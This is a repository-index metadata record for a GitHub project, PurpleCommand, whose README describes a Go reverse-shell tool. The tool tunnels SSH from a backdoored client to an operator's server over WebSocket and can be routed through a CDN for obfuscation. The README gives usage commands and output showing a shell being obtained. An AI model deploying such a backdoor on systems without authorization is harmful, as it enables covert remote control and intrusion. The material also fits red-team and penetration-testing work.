{"id":21089513,"url":"https://github.com/farinap5/purplecommand","last_synced_at":"2025-05-16T12:32:15.014Z","repository":{"id":215832042,"uuid":"604902771","full_name":"farinap5/PurpleCommand","owner":"farinap5","description":"Reverse Shell based on SSH over websocket.","archived":false,"fork":false,"pushed_at":"2025-05-12T01:57:39.000Z","size":239,"stargazers_count":4,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-05-12T02:42:48.337Z","etag":null,"topics":["reverse-shell","ssh","websocket"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/farinap5.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2023-02-22T02:46:14.000Z","updated_at":"2025-05-05T00:46:18.000Z","dependencies_parsed_at":"2024-01-12T00:10:17.218Z","dependency_job_id":"573c29ad-f307-448d-93b3-37e79160f0d2","html_url":"https://github.com/farinap5/PurpleCommand","commit_stats":null,"previous_names":["farinap5/purplecommand"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/farinap5%2FPurpleCommand","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/farinap5%2FPurpleCommand/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/farinap5%2FPurpleCommand/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/farinap5%2FPurpleCommand/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/farinap5","download_url":"https://codeload.github.com/farinap5/PurpleCommand/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254530340,"owners_count":22086594,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["reverse-shell","ssh","websocket"],"created_at":"2024-11-19T21:29:18.456Z","updated_at":"2025-05-16T12:32:09.968Z","avatar_url":"https://github.com/farinap5.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"# PurpCMD\n\nFor the current version the process mey be killed from client (backdoored) side due to error.\n\nPurpcmd operates by initiating a simple SSH server on the client side. Leveraging SSH has many improved features to work with remote terminals, such as enhanced interaction quality, window resizing, full duplex communications, and more. This type of approach tends to work better than using reverse shell, that use system features, synchronized sockets and IO, it will have limited capabilities. Purpcmd employs a reverse WebSocket connection to seamlessly synchronize the SSH connection with the server.\n\nThe communication is secure and very malleable. It can be channeled through Content Delivery Network (CDN) to enhance obfuscation and other security measures.\n\n![img1](img/img1.png)\n\n\n### Help Menu\n\n```\nServer usage: purpcmd server [options] ...\n\t-k configures the path to the private key.\n\tBy default an embed key pair is used to authenticate the\n\tconnection.\n\tUse \"-k /path/to/id_rsa\".\n\nClient usage: purpcmd client [options] ...\n\t-ua defines the User-Agent HTTP header to use\n\tduring the request.\n\n\t-p must be used to set the path to a public key.\n\tBy default an embed key pair is used to authenticate the\n\tconnection. If the server is using a custom private key,\n\tthis option must be used to specify the pair.\n\tUse \"-p /path/to/id_rsa.pub\".\n\n\t-ps allows passing the public key right from the command\n\tline.\n\tUse \"-ps 'ssh-rsa AAAAB3NzaC'\".\n\t\nGlobal Options:\n\t-a is the address to listen on or connect to.\n\tUse \"-a 127.0.0.1:8080\".\n\t\t\n\t-uri configures the URI where to connect or to receive \n\tthe websocket connection.\n\tUse \"-uri /assets\".\n\n```\n\n### 1. Start the server\n\n```\ngo run . server\n2024/02/17 01:08:57 Listening on ws://0.0.0.0:8080/\n```\n\n### 2. Execute the client\n\n```\ngo run . client -a 0.0.0.0:8080\n2024/02/17 01:10:32 Connecting to ws://0.0.0.0:8080/\n2024/02/17 01:10:32 Key O+XvBDAEHzyN9s78Iy6iegk3vWT7hzQZsErg/2Y+Ehg= found.\n2024/02/17 01:10:32 Client got shell\n```\n\n### 3. Use the server new shell\n\n```\n╰─$ go run . server\n2024/02/17 01:08:57 Listening on ws://0.0.0.0:8080/\n2024/02/17 01:10:32 Proxy connected 0.0.0.0:8080\nSetting up STDIN\nSetting up STDOUT\nSetting up STDERR\ncall shell\nfarinap@xyz:~/go/src/PurpleCommand$ ls\nLICENSE  README.md  agent  go.mod  go.sum  img  main.go  server  utils\nfarinap@xyz:~/go/src/PurpleCommand$\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ffarinap5%2Fpurplecommand","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ffarinap5%2Fpurplecommand","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ffarinap5%2Fpurplecommand/lists"}